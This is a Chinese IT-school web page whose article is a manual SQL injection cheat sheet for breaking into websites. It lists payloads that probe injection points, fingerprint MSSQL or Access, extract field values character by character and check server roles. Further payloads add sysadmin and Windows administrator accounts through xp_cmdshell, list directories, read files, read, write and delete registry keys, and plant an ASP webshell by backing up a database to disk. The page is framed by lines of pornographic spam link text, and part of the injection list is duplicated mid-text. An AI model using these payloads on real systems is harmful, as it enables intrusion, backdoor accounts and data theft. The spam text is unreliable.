亚洲AV无码国产精品午友情链接,五月丁香在线视频,欧美日韩人妻,曰本大码熟中文字幕

鄭州信息科技中專職業(yè)學院中專部

不僅僅統(tǒng)招學歷喲

  • 熱門專業(yè)!
  • 大學校園!
  • 就業(yè)保障!
  • 拿學歷又能高薪就業(yè),誰能不愛!
了解詳情>
鄭州北大青鳥翔天信鴿參加“安心學習·放心就業(yè)”公約簽約儀式

讓每一個家庭“安心”、“放心”

  • 教學為本
  • 師愛為魂
  • 安心學習
  • 放心就業(yè)
了解詳情>
北大青鳥20周年慶典與總部年會鄭州翔天信鴿榮獲7項榮譽

深耕細作IT職業(yè)教育15載

  • 青鳥之星教學質量大獎
  • 卓越風云人物
  • 北大青鳥中心理事會成員
  • 七項榮耀載譽而行!
了解詳情>
鄭州北大青鳥學員喜獲全國IT精英挑戰(zhàn)賽冠軍

我們教學怎么樣

  • 實力見證
  • 網絡組一等獎
  • 網絡組二等獎
  • 軟件組四等獎
  • 200家校區(qū)脫穎而出!
了解更多>
北大青鳥榮獲315重承諾守信用放心品牌

北大青鳥職業(yè)IT20周年

  • 重承諾
  • 守信用
  • 放心品牌
  • 放心學習
  • 靠靠譜譜好就業(yè)!
了解更多>
學IT好工作高薪就業(yè)

我命由我不由天

  • 學個性的技術
  • 做愛做的事
  • 掙滿意的錢
  • 衣食無憂
  • 選擇寬且高大尚!
了解更多>
鄭州北大青鳥IT培訓辦學14年

我們靠不靠譜

  • 14年辦學
  • 14年磨練
  • 14年成長
  • 14年探索
  • 只為讓每個學員成材!
了解更多>
鄭州北大青鳥IT培訓

不打工也牛掰

  • 好工作
  • 好環(huán)境
  • 高薪資
  • 好課程
  • 支持你成為有“錢”人!
了解更多>

學IT就讀北大青鳥

  • 好工作
  • 好未來
  • 好老師
  • 好課程
  • 支持你成為受人尊敬的人!
了解更多>
    當前位置: 首頁 > 河南鄭州北大青鳥學校 > 技術交流 > 網絡安全
看看黑客如何手工注入方法入侵網站的
作者:北大青鳥 添加時間:04-01 瀏覽次數:0

 我們在入侵網站的時候,有時候直接靠工具是無法找到注入點的,所以很多時候都要用到手工注入,下面列舉一些方法:

1.判斷是否有注入;and 1=1 ;and 1=2
2.初步判斷是否是mssql ;and user>0
3.注入參數是字符’and [查詢條件] and ”=’
4.搜索時沒過濾參數的’and [查詢條件] and ‘%25′=’
5.判斷數據庫系統(tǒng)
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
6.猜數據庫 ;and (select Count(*) from [數據庫名])>0
7.猜字段 ;and (select Count(字段名) from 數據庫名)>0 1.判斷是否有注入;and 1=1 ;and 1=2
2.初步判斷是否是mssql ;and user>0
3.注入參數是字符’and [查詢條件] and ”=’
4.搜索時沒過濾參數的’and [查詢條件] and ‘%25′=’
5.判斷數據庫系統(tǒng)
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
6.猜數據庫 ;and (select Count(*) from [數據庫名])>0
7.猜字段 ;and (select Count(字段名) from 數據庫名)>0
8.猜字段中記錄長度 ;and (select top 1 len(字段名) from 數據庫名)>0
9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 數據庫名)>0
(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 數據庫名)>0
10.測試權限結構(mssql)
;and 1=(select IS_SRVROLEMEMBER(‘sysadmin’));–
;and 1=(select IS_SRVROLEMEMBER(‘serveradmin’));–
;and 1=(select IS_SRVROLEMEMBER(‘setupadmin’));–
;and 1=(select IS_SRVROLEMEMBER(‘securityadmin’));–
;and 1=(select IS_SRVROLEMEMBER(‘diskadmin’));–
;and 1=(select IS_SRVROLEMEMBER(‘bulkadmin’));–
;and 1=(select IS_MEMBER(‘db_owner’));–
11.添加mssql和系統(tǒng)的帳戶
;exec master.dbo.sp_addlogin username;–
;exec master.dbo.sp_password null,username,password;–
;exec master.dbo.sp_addsrvrolemember sysadmin username;–
;exec master.dbo.xp_cmdshell ‘net user username password
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add’;–
;exec master.dbo.xp_cmdshell ‘net user username password /add’;–
;exec master.dbo.xp_cmdshell ‘net localgroup administrators username /add’;–
12.(1)遍歷目錄
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree ‘c:\’
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in(‘上步得到的paths’))>)
(2)遍歷目錄
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));–
;insert temp exec master.dbo.xp_availablemedia;– 獲得當前所有驅動器
;insert into temp(id) exec master.dbo.xp_subdirs ‘c:\’;– 獲得子目錄列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree ‘c:\’;– 獲得所有子目錄的目錄樹構
;insert into temp(id) exec master.dbo.xp_cmdshell ‘type c:\web\index.asp’;– 查看文件的內容
13.mssql中的存儲過程
xp_regenumvalues 注冊表根鍵, 子鍵
;exec xp_regenumvalues ‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Windows\CurrentVersion\Run’ 以多個記錄集方式返回所有鍵值
xp_regread 根鍵,子鍵,鍵值名
;exec xp_regread
‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Windows\CurrentVersion’,'CommonFilesDir’ 返回制定鍵的值
xp_regwrite 根鍵,子鍵, 值名, 值類型, 值
值類型有2種REG_SZ 表示字符型,REG_DWORD 表示整型
;exec xp_regwrite ‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Windows\CurrentVersion’,'TestValueName’,'reg_sz’,'hello’ 寫入注冊表
xp_regdeletevalue 根鍵,子鍵,值名
exec xp_regdeletevalue ‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Windows\CurrentVersion’,'TestValueName’ 刪除某個值
xp_regdeletekey ‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey’ 刪除鍵,包括該鍵下所有值
14.mssql的backup創(chuàng)建webshell
use model
create table cmd(str image);
insert into cmd(str) values (”);
backup database model to disk=’c:\l.asp’;
15.mssql內置函數
;and (select @@version)>0 獲得Windows的版本號
;and user_name()=’dbo’ 判斷當前系統(tǒng)的連接用戶是不是sa
;and (select user_name())>0 爆當前系統(tǒng)的連接用戶
;and (select db_name())>0 得到當前連接的數據庫
16.簡潔的webshell
use model
create table cmd(str image);
insert into cmd(str) values (”);
backup database model to disk=’g:\wwwtest\l.asp’;
文章由鄭州北大青鳥搜集整理,轉載請注明!

本文由站河南北大青鳥校區(qū)整編而成,如需了解更多IT資訊類的文章、新聞、課程和學習技巧、就業(yè)案例、招生詳情等問題,可以對在線咨詢老師進行一對一問答!

分享到:
国产av无码专区亚洲av桃花庵 | 国产乱妇高清无乱码免费| www. 中文字幕| 国产三级电影在线| 亚洲天堂啪| 国产成人精品综合| 欧美精品色婷婷五月综合| 97伊人91| 少妇高潮太爽了在线观看| 啊啊啊免费看| 亚洲AV无码一区二区三区国产 | 日韩欧美精品久久黄| 丰满白嫩尤物一区二区| 精品少妇人妻视频网站| 精品思思| 韩日AV免费| 色性在线| 欧美久久老司机| 日韩 综合| 日韩AV在线大全| 国产精品成人99久久久久| 中国黄片一级免费看| 18禁裸乳无遮挡啪啪无码免费| 国产思思久9re| 性爱人妻天天| 日本啊v| 欧美色综合五月| 一级影院| 欧美日图一图二图三| 欧美日韩精品一区二区三区高清视频| 欧美激情第七页精品| 亚洲二区在线| 蜜臀首页素人一区| 精品亚洲国产桃色| 中文无码二区| 极品亚洲久久| 欧美日韩亚洲色| 910麻豆| 国产免费无码一区二区视频| 九九久久电影| z0ozo0人善之交另类|